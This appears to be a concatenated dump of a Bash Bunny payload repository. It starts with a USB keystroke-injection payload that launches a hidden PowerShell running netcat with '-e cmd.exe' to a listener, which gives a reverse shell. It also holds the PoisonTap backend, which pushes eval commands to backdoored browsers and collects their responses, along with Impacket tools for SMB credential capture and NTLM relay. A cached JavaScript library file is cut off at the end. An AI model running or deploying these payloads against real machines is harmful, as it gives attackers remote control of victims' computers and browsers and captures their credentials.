auto_increment=false 28 | 29 | LED G 30 | ATTACKMODE HID STORAGE 31 | 32 | LANGUAGE='us' 33 | 34 | # Get the switch position 35 | source bunny_helpers.sh 36 | 37 | 38 | # Check for all the files - error if not found. If found, put into variables 39 | if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then 40 | LED B 100 41 | exit 1 42 | else 43 | my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` 44 | fi 45 | 46 | if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then 47 | LED B G 100 48 | exit 1 49 | else 50 | my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` 51 | fi 52 | 53 | if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then 54 | LED R G 100 55 | exit 1 56 | fi 57 | 58 | # Execute the powershell command in the run box with the appropriate variables 59 | QUACK GUI r 60 | QUACK DELAY 100 61 | QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" 62 | QUACK ENTER 63 | 64 | # If auto_increment, then update the listener_port file 65 | if [ "$auto_increment" = true ] ; then 66 | LED R G B 100 67 | echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt 68 | 69 | # Allow the write to sync to the USB 70 | sleep 1 71 | fi 72 | 73 | # Signal everything went OK - white 74 | LED R G B 75 | exit 0 76 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/ping6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple ICMP6 ping. 
9 | # 10 | # This implementation of ping uses the ICMP echo and echo-reply packets 11 | # to check the status of a host. If the remote host is up, it should reply 12 | # to the echo probe with an echo-reply packet. 13 | # Note that this isn't a definite test, as in the case the remote host is up 14 | # but refuses to reply the probes. 15 | # Also note that the user must have special access to be able to open a raw 16 | # socket, which this program requires. 17 | # 18 | # Authors: 19 | # Alberto Solino (@agsolino) 20 | # 21 | # Reference for: 22 | # ImpactPacket: ICMP6 23 | # ImpactDecoder. 24 | 25 | import select 26 | import socket 27 | import time 28 | import sys 29 | 30 | from impacket import ImpactDecoder, ImpactPacket, IP6, ICMP6, version 31 | 32 | print version.BANNER 33 | 34 | if len(sys.argv) < 3: 35 | print "Use: %s " % sys.argv[0] 36 | sys.exit(1) 37 | 38 | src = sys.argv[1] 39 | dst = sys.argv[2] 40 | 41 | # Create a new IP packet and set its source and destination addresses. 42 | 43 | ip = IP6.IP6() 44 | ip.set_ip_src(src) 45 | ip.set_ip_dst(dst) 46 | ip.set_traffic_class(0) 47 | ip.set_flow_label(0) 48 | ip.set_hop_limit(64) 49 | 50 | # Open a raw socket. Special permissions are usually required. 51 | s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6) 52 | 53 | payload = "A"*156 54 | 55 | print "PING %s %d data bytes" % (dst, len(payload)) 56 | seq_id = 0 57 | while 1: 58 | # Give the ICMP packet the next ID in the sequence. 59 | seq_id += 1 60 | icmp = ICMP6.ICMP6.Echo_Request(1, seq_id, payload) 61 | 62 | # Have the IP packet contain the ICMP packet (along with its payload). 63 | ip.contains(icmp) 64 | ip.set_next_header(ip.child().get_ip_protocol_number()) 65 | ip.set_payload_length(ip.child().get_size()) 66 | icmp.calculate_checksum() 67 | 68 | # Send it to the target host. 69 | s.sendto(icmp.get_packet(), (dst, 0)) 70 | 71 | # Wait for incoming replies. 
72 | if s in select.select([s],[],[],1)[0]: 73 | reply = s.recvfrom(2000)[0] 74 | 75 | # Use ImpactDecoder to reconstruct the packet hierarchy. 76 | rip = ImpactDecoder.ICMP6Decoder().decode(reply) 77 | 78 | # If the packet matches, report it to the user. 79 | if ICMP6.ICMP6.ECHO_REPLY == rip.get_type(): 80 | print "%d bytes from %s: icmp_seq=%d " % (rip.child().get_size()-4,dst,rip.get_echo_sequence_number()) 81 | 82 | time.sleep(1) 83 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_Dot11Decoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from ImpactDecoder import Dot11Decoder #,Dot11Types 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11Decoder(unittest.TestCase): 12 | 13 | def setUp(self): 14 | self.WEPKey=None #Unknown 15 | self.WEPData='\x08\x41\x3a\x01\x00\x17\x3f\x44\x4f\x96\x00\x13\xce\x67\x0e\x73\x00\x17\x3f\x44\x4f\x96\xb0\x04\xeb\xcd\x8b\x00\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17\xdd\xb5\xd4\x35' 16 | dot11_decoder = Dot11Decoder() 17 | self.in0=dot11_decoder.decode(self.WEPData) 18 | self.in1=self.in0.child() 19 | self.in2=self.in1.child() 20 | self.in3=self.in2.child() 21 | if self.WEPKey: 22 | self.in4=self.in3.child() 23 | self.in5=self.in4.child() 24 | 25 | def test_01_Dot11Decoder(self): 26 | 'Test Dot11 decoder' 27 | self.assertEqual(str(self.in0.__class__), "dot11.Dot11") 28 | 29 | def test_02_Dot11DataFrameDecoder(self): 30 | 'Test Dot11DataFrame decoder' 31 | self.assertEqual(str(self.in1.__class__), "dot11.Dot11DataFrame") 32 | 33 | def 
test_03_Dot11WEP(self): 34 | 'Test Dot11WEP decoder' 35 | self.assertEqual(str(self.in2.__class__), "dot11.Dot11WEP") 36 | 37 | def test_04_Dot11WEPData(self): 38 | 'Test Dot11WEPData decoder' 39 | 40 | if not self.WEPKey: 41 | return 42 | 43 | self.assertEqual(str(self.in3.__class__), "dot11.Dot11WEPData") 44 | 45 | # Test if wep data "get_packet" is correct 46 | wepdata='\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17' 47 | self.assertEqual(self.in3.get_packet(),wepdata) 48 | 49 | def test_05_LLC(self): 50 | 'Test LLC decoder' 51 | if self.WEPKey: 52 | self.assertEqual(str(self.in4.__class__), "dot11.LLC") 53 | 54 | def test_06_Data(self): 55 | 'Test LLC Data decoder' 56 | 57 | if self.WEPKey: 58 | dataclass=self.in4.__class__ 59 | else: 60 | dataclass=self.in3.__class__ 61 | 62 | self.assertTrue(str(dataclass).find('ImpactPacket.Data') > 0) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11Decoder) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/types.py: -------------------------------------------------------------------------------- 1 | # This file is part of creddump. 2 | # 3 | # creddump is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # creddump is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 
12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with creddump. If not, see . 15 | 16 | """ 17 | @author: Brendan Dolan-Gavitt 18 | @license: GNU General Public License 2.0 or later 19 | @contact: bdolangavitt@wesleyan.edu 20 | """ 21 | 22 | regtypes = { 23 | '_CM_KEY_VALUE' : [ 0x18, { 24 | 'Signature' : [ 0x0, ['unsigned short']], 25 | 'NameLength' : [ 0x2, ['unsigned short']], 26 | 'DataLength' : [ 0x4, ['unsigned long']], 27 | 'Data' : [ 0x8, ['unsigned long']], 28 | 'Type' : [ 0xc, ['unsigned long']], 29 | 'Flags' : [ 0x10, ['unsigned short']], 30 | 'Spare' : [ 0x12, ['unsigned short']], 31 | 'Name' : [ 0x14, ['array', 1, ['unsigned short']]], 32 | } ], 33 | '_CM_KEY_NODE' : [ 0x50, { 34 | 'Signature' : [ 0x0, ['unsigned short']], 35 | 'Flags' : [ 0x2, ['unsigned short']], 36 | 'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']], 37 | 'Spare' : [ 0xc, ['unsigned long']], 38 | 'Parent' : [ 0x10, ['unsigned long']], 39 | 'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]], 40 | 'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]], 41 | 'ValueList' : [ 0x24, ['_CHILD_LIST']], 42 | 'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']], 43 | 'Security' : [ 0x2c, ['unsigned long']], 44 | 'Class' : [ 0x30, ['unsigned long']], 45 | 'MaxNameLen' : [ 0x34, ['unsigned long']], 46 | 'MaxClassLen' : [ 0x38, ['unsigned long']], 47 | 'MaxValueNameLen' : [ 0x3c, ['unsigned long']], 48 | 'MaxValueDataLen' : [ 0x40, ['unsigned long']], 49 | 'WorkVar' : [ 0x44, ['unsigned long']], 50 | 'NameLength' : [ 0x48, ['unsigned short']], 51 | 'ClassLength' : [ 0x4a, ['unsigned short']], 52 | 'Name' : [ 0x4c, ['array', 1, ['unsigned short']]], 53 | } ], 54 | '_CM_KEY_INDEX' : [ 0x8, { 55 | 'Signature' : [ 0x0, ['unsigned short']], 56 | 'Count' : [ 0x2, ['unsigned short']], 57 | 'List' : [ 0x4, ['array', 1, ['unsigned long']]], 58 | } ], 59 | '_CHILD_LIST' : [ 0x8, { 60 | 'Count' : [ 0x0, ['unsigned long']], 61 | 'List' : [ 0x4, ['unsigned 
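long']], 62 | } ], 63 | } 64 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/smbserver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple SMB Server example. 9 | # 10 | # Author: 11 | # Alberto Solino (@agsolino) 12 | # 13 | 14 | import sys 15 | import argparse 16 | import logging 17 | 18 | from impacket.examples import logger 19 | from impacket import smbserver, version 20 | 21 | 
if __name__ == '__main__':
    # Command-line entry point: serve one local directory as an SMB share.
    #
    # SECURITY NOTE (review): as the help text below says, no authentication
    # is enforced -- any client that can reach this host on TCP 445 can use
    # the share. Only point it at a directory you are willing to hand to
    # everyone on the network segment, and do not leave it running.

    # Init the example's logger theme
    logger.init()
    print(version.BANNER)

    parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a "
                                     "share specified as an argument. You need to be root in order to bind to port 445. "
                                     "No authentication will be enforced. Example: smbserver.py -comment 'My share' TMP "
                                     "/tmp")

    parser.add_argument('shareName', action='store', help='name of the share to add')
    parser.add_argument('sharePath', action='store', help='path of the share to add')
    parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    try:
        options = parser.parse_args()
    except Exception as e:
        logging.critical(str(e))
        sys.exit(1)

    logging.getLogger().setLevel(logging.DEBUG if options.debug else logging.INFO)

    # Fail fast on a mistyped path instead of starting a server whose share
    # errors on every access.
    import os
    if not os.path.isdir(options.sharePath):
        logging.critical("share path %s is not a directory" % options.sharePath)
        sys.exit(1)

    # argparse leaves the option as None when it was not given; the server
    # expects a string.
    comment = options.comment if options.comment is not None else ''

    server = smbserver.SimpleSMBServer()

    # The share name is registered upper-cased (share names are not
    # case-sensitive on the wire).
    server.addShare(options.shareName.upper(), options.sharePath, comment)
    server.setSMB2Support(options.smb2support)

    # Here you can set a custom SMB challenge in hex format
    # If empty defaults to '4141414141414141'
    # (remember: must be 16 hex digits, i.e. an 8-byte challenge)
    # e.g. server.setSMBChallenge('12345678abcdef00')
    #
    # NOTE(review): a fixed, publicly known challenge means every NTLM
    # response this server captures was computed over the same server
    # nonce, which is exactly what makes those responses attackable
    # offline with precomputed tables. That is the point for a
    # credential-capture tool; it is also why this setting must never be
    # copied into anything meant to authenticate real users.
    server.setSMBChallenge('')

    # If you don't want log to stdout, comment the following line
    # If you want log dumped to a file, enter the filename
    server.setLogFile('')

    # Rock and roll
    server.start()

-------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/clients/imaprelayclient.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Author: 9 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) 10 | # 11 | # Description: 12 | # IMAP client for relaying NTLMSSP authentication to mailservers, for example Exchange 13 | # 14 | import logging 15 | import imaplib 16 | import base64 17 | 18 | class IMAPRelayClient: 19 | def __init__(self, target): 20 | # Target comes as protocol://target:port 21 | self.target = target 22 | proto, host, port = target.split(':') 23 | host = host[2:] 24 | if int(port) == 993 or proto.upper() == 'IMAPS': 25 | self.session = imaplib.IMAP4_SSL(host,int(port)) 26 | else: 27 | #assume non-ssl IMAP 28 | self.session = imaplib.IMAP4(host,port) 29 | if 'AUTH=NTLM' not in self.session.capabilities: 30 | logging.error('IMAP server does not support NTLM authentication!') 31 | return False 32 | self.authtag = self.session._new_tag() 33 | self.lastresult = None 34 | 35 | def sendNegotiate(self,negotiateMessage): 36 | #Negotiate auth 37 | negotiate = base64.b64encode(negotiateMessage) 38 | self.session.send('%s AUTHENTICATE NTLM%s' % (self.authtag,imaplib.CRLF)) 39 | resp = self.session.readline().strip() 40 | if resp != '+': 41 | logging.error('IMAP 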
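Client error, expected continuation (+), got %s ' % resp) 42 | return False 43 | else: 44 | self.session.send(negotiate + imaplib.CRLF) 45 | try: 46 | serverChallengeBase64 = self.session.readline().strip()[2:] #first two chars are the continuation and space char 47 | serverChallenge = base64.b64decode(serverChallengeBase64) 48 | return serverChallenge 49 | except (IndexError, KeyError, AttributeError): 50 | logging.error('No NTLM challenge returned from IMAP server') 51 | 52 | def sendAuth(self,authenticateMessageBlob, serverChallenge=None): 53 | #Send auth 54 | auth = base64.b64encode(authenticateMessageBlob) 55 | self.session.send(auth + imaplib.CRLF) 56 | typ, data = self.session._get_tagged_response(self.authtag) 57 | if typ == 'OK': 58 | self.session.state = 'AUTH' 59 | return True 60 | else: 61 | logging.info('Auth failed - IMAP server said: %s' % ' '.join(data)) 62 | return False 63 | 64 | #SMB Relay server needs this 65 | @staticmethod 66 | def get_encryption_key(): 67 | return None -------------------------------------------------------------------------------- /payloads/library/BunnyTap/backend_server.js: -------------------------------------------------------------------------------- 
// PoisonTap by Samy Kamkar - https://samy.pl/poisontap
//
// Backend for the PoisonTap backdoor. Every backdoored browser opens a
// WebSocket to this server; HTTP requests to /exec and /send are fanned out
// to all connected clients as JSON commands, and /send hands back the HTML a
// client returns in a 'getresponse' message.
//
// SECURITY NOTE (review): nothing on this port is authenticated. Anyone who
// can reach TCP 1337 can push `eval` payloads into every connected browser
// and read back what they return. Keep it behind a firewall or SSH tunnel,
// or bind it to a loopback address.
'use strict'

//var _ = require('underscore')
const WebSocketServer = require('websocket').server
const webSocketsServerPort = 1337
const http = require('http')

// How long a /send request waits for a client answer before giving up (ms).
const getResponseTimeoutMs = 30000
// Poll interval while waiting for a 'getresponse' message (ms).
const getResponsePollMs = 500

// All live WebSocket connections (one per backdoored client).
const conns = []
// HTML from the most recent 'getresponse' message, consumed by /send.
// It is a single shared slot, so two overlapping /send requests can take
// each other's answer.
let gr

// Sends `text` to every connected client.
function broadcast(text) {
  for (const c of conns)
    c.sendUTF(text)
}

// Turns the query string of a /send?k=v&k2=v2 request into a JSON object
// string. JSON.stringify escapes quotes and backslashes correctly, which the
// earlier replace()-based builder did not (a backslash or an unescaped quote
// in a value produced JSON the client could not parse). Unlike the old
// decodeURI path, '+' decodes to a space and %26/%3D are decoded too.
function queryToJson(url) {
  const params = new URL(url, 'http://localhost').searchParams
  const obj = Object.create(null)
  params.forEach((value, key) => { obj[key] = value })
  return JSON.stringify(obj)
}

const server = http.createServer((request, response) => {
  console.log((new Date()) + ' HTTP server. URL ' + request.url + ' requested.')

  if (request.url.indexOf('/exec?') === 0)
  {
    // Everything after '/exec?' is sent verbatim for the clients to eval().
    // The 404 is deliberate: the endpoint should not look interesting.
    response.writeHead(404, {'Content-Type': 'text/html'})
    broadcast(JSON.stringify({ request: 'eval', content: request.url.slice(6) }))
    response.end("sent")
  }
  else if (request.url.indexOf('/send?') === 0)
  {
    response.writeHead(404, {'Content-Type': 'text/html'})
    broadcast(queryToJson(request.url))

    // Poll until a client answers with 'getresponse', then hand its HTML to
    // the HTTP caller. Bounded so a request with no listening client does not
    // keep the response (and a timer) alive forever, as it used to.
    const deadline = Date.now() + getResponseTimeoutMs
    const checkgr = () =>
    {
      if (gr)
      {
        response.end(gr)
        gr = ""
      }
      else if (Date.now() >= deadline)
        response.end("")
      else
        setTimeout(checkgr, getResponsePollMs)
    }
    checkgr()
  }
  else if (request.url === '/status')
  {
    response.writeHead(200, {'Content-Type': 'application/json'})
    const responseObject = {
      // Number of clients currently connected (was a hard-coded 1234).
      currentClients: conns.length,
      // Placeholder kept from upstream: nothing here tracks a history.
      totalHistory: 567
    }
    response.end(JSON.stringify(responseObject))
  }
  else {
    response.writeHead(404, {'Content-Type': 'text/html'})
    response.end('Sorry, unknown url')
  }
})
server.listen(webSocketsServerPort, () => {
  console.log((new Date()) + " Server is listening on port " + webSocketsServerPort)
})

// create the server (previously assigned to an undeclared global)
const wsServer = new WebSocketServer({
  httpServer: server
})

// Handles one parsed JSON message from a client. Only 'getresponse' is
// understood: its html is stored for the pending /send request.
function handleReq(obj, con)
{
  if (obj.request === 'getresponse')
    gr = obj.html
}

wsServer.on('request', (request) => {
  // The origin is passed through as-is; no origin check is performed.
  const connection = request.accept(null, request.origin)
  conns.push(connection)

  connection.on('message', (message) => {
    // Parse fresh for every message. With `obj` declared outside this
    // handler (as before), a message that failed to parse re-dispatched the
    // previous message's object.
    let obj
    try { obj = JSON.parse(message.utf8Data) } catch(e) { }
    console.log('message: ' + message.utf8Data)
    console.log(obj)

    // typeof null === 'object', so exclude a literal `null` message explicitly.
    if (typeof(obj) === 'object' && obj !== null)
      handleReq(obj, connection)
    else
      connection.sendUTF('hello')
  })

  // remove connection from our list
  // The 'close' event argument is the close code, not the connection, so the
  // old `connection => ... conns[i] == connection` never matched (and then
  // called splice on an undefined `conn`); use the closure's connection.
  connection.on('close', () => {
    console.log('connection closed')
    const idx = conns.indexOf(connection)
    if (idx !== -1)
      conns.splice(idx, 1)
  })
})

-------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/uuid.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Description: 8 | # Generate UUID compliant with http://www.webdav.org/specs/draft-leach-uuids-guids-01.txt. 9 | # A different, much simpler (not necessarily better) algorithm is used. 10 | # 11 | # Author: 12 | # Javier Kohen (jkohen) 13 | # 14 | 15 | import re 16 | 17 | from random import randrange 18 | from struct import pack, unpack 19 | 20 | def generate(): 21 | # UHm... crappy Python has an maximum integer of 2**31-1. 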
22 | top = (1L<<31)-1 23 | return pack("IIII", randrange(top), randrange(top), randrange(top), randrange(top)) 24 | 25 | def bin_to_string(uuid): 26 | uuid1, uuid2, uuid3 = unpack('HHL', uuid[8:16]) 28 | return '%08X-%04X-%04X-%04X-%04X%08X' % (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) 29 | 30 | def string_to_bin(uuid): 31 | matches = re.match('([\dA-Fa-f]{8})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})([\dA-Fa-f]{8})', uuid) 32 | (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) = map(lambda x: long(x, 16), matches.groups()) 33 | uuid = pack('HHL', uuid4, uuid5, uuid6) 35 | return uuid 36 | 37 | def stringver_to_bin(s): 38 | (maj,min) = s.split('.') 39 | return pack(' 20 | # Javier Kohen 21 | # 22 | # Reference for: 23 | # ImpactPacket: IP, ICMP, DATA. 24 | # ImpactDecoder. 25 | 26 | import select 27 | import socket 28 | import time 29 | import sys 30 | 31 | from impacket import ImpactDecoder, ImpactPacket 32 | 33 | if len(sys.argv) < 3: 34 | print "Use: %s " % sys.argv[0] 35 | sys.exit(1) 36 | 37 | src = sys.argv[1] 38 | dst = sys.argv[2] 39 | 40 | # Create a new IP packet and set its source and destination addresses. NOTE(review): src is taken straight from argv and written into the IP header as-is. If it is not an address of this host the probe is source-spoofed: the echo reply is routed to that address, not here, and the reply filter below will never match. 41 | 42 | ip = ImpactPacket.IP() 43 | ip.set_ip_src(src) 44 | ip.set_ip_dst(dst) 45 | 46 | # Create a new ICMP packet of type ECHO. 47 | 48 | icmp = ImpactPacket.ICMP() 49 | icmp.set_icmp_type(icmp.ICMP_ECHO) 50 | 51 | # Include a 156-character long payload inside the ICMP packet. 52 | icmp.contains(ImpactPacket.Data("A"*156)) 53 | 54 | # Have the IP packet contain the ICMP packet (along with its payload). 55 | ip.contains(icmp) 56 | 57 | # Open a raw socket. Special permissions are usually required. IP_HDRINCL tells the kernel to use the IP header built above (including the src address) instead of filling in its own. 58 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) 59 | s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) 60 | 61 | seq_id = 0 62 | while 1: 63 | # Give the ICMP packet the next ID in the sequence. This goes into the ICMP identifier field (a 16-bit field), not the sequence-number field, and seq_id is never wrapped -- presumably set_icmp_id masks or rejects values above 65535; verify before running this for long. 64 | seq_id += 1 65 | icmp.set_icmp_id(seq_id) 66 | 67 | # Calculate its checksum. The field is zeroed first; auto_checksum = 1 asks ImpactPacket to compute it when the packet is serialised (presumably inside get_packet() -- verify). 
68 | icmp.set_icmp_cksum(0) 69 | icmp.auto_checksum = 1 70 | 71 | # Send it to the target host. 72 | s.sendto(ip.get_packet(), (dst, 0)) 73 | 74 | # Wait for incoming replies. select() gives up after 1 s and only one datagram is read per loop iteration; a reply arriving later is picked up on a following iteration. 75 | if s in select.select([s],[],[],1)[0]: 76 | reply = s.recvfrom(2000)[0] 77 | 78 | # Use ImpactDecoder to reconstruct the packet hierarchy. 79 | rip = ImpactDecoder.IPDecoder().decode(reply) 80 | # Extract the ICMP packet from its container (the IP packet). 81 | ricmp = rip.child() 82 | 83 | # If the packet matches, report it to the user. Matching is on the two addresses and the ICMP type only; the reply's id is printed but never compared with seq_id, so a reply to an earlier probe is still reported, under its own number. 84 | if rip.get_ip_dst() == src and rip.get_ip_src() == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type(): 85 | print "Ping reply for sequence #%d" % ricmp.get_icmp_id() 86 | 87 | time.sleep(1) 88 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/js/ajax.googleapis.com__ajax__libs__scriptaculous__1.8.1__scriptaculous.js: -------------------------------------------------------------------------------- 1 | // script.aculo.us scriptaculous.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008 2 | 3 | // Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) 4 | // 5 | // Permission is hereby granted, free of charge, to any person obtaining 6 | // a copy of this software and associated documentation files (the 7 | // "Software"), to deal in the Software without restriction, including 8 | // without limitation the rights to use, copy, modify, merge, publish, 9 | // distribute, sublicense, and/or sell copies of the Software, and to 10 | // permit persons to whom the Software is furnished to do so, subject to 11 | // the following conditions: 12 | // 13 | // The above copyright notice and this permission notice shall be 14 | // included in all copies or substantial portions of the Software. 
15 | // 16 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 19 | // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 20 | // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 21 | // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 22 | // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 23 | // 24 | // For details, see the script.aculo.us web site: http://script.aculo.us/ 25 | 26 | var Scriptaculous = { 27 | Version: '1.8.1', 28 | require: function(libraryName) { 29 | // inserting via DOM fails in Safari 2.0, so brute force approach 30 | document.write('